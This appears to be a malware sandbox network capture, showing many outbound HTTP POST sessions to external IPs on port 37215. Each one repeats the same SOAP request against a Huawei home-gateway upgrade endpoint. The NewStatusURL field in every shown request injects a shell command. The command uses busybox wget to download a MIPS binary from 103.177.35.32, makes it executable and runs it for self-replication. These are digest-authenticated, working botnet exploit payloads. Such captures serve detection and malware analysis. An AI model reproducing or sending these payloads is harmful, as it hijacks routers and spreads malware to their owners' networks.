                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2372192.168.2.2333094197.56.176.13037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.594368935 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2373192.168.2.233884241.112.81.9137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.594396114 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2374192.168.2.2342938197.148.137.12737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.594434023 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2375192.168.2.2339732157.111.57.1137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.594435930 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2376192.168.2.233661089.15.71.1737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.594461918 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2377192.168.2.236081241.79.76.5537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.594640017 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2378192.168.2.2358414136.224.165.14137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.594933987 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2379192.168.2.234325841.104.71.14437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.594948053 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2380192.168.2.235719441.53.102.2737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.595302105 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2381192.168.2.235859841.137.45.8137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.595369101 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
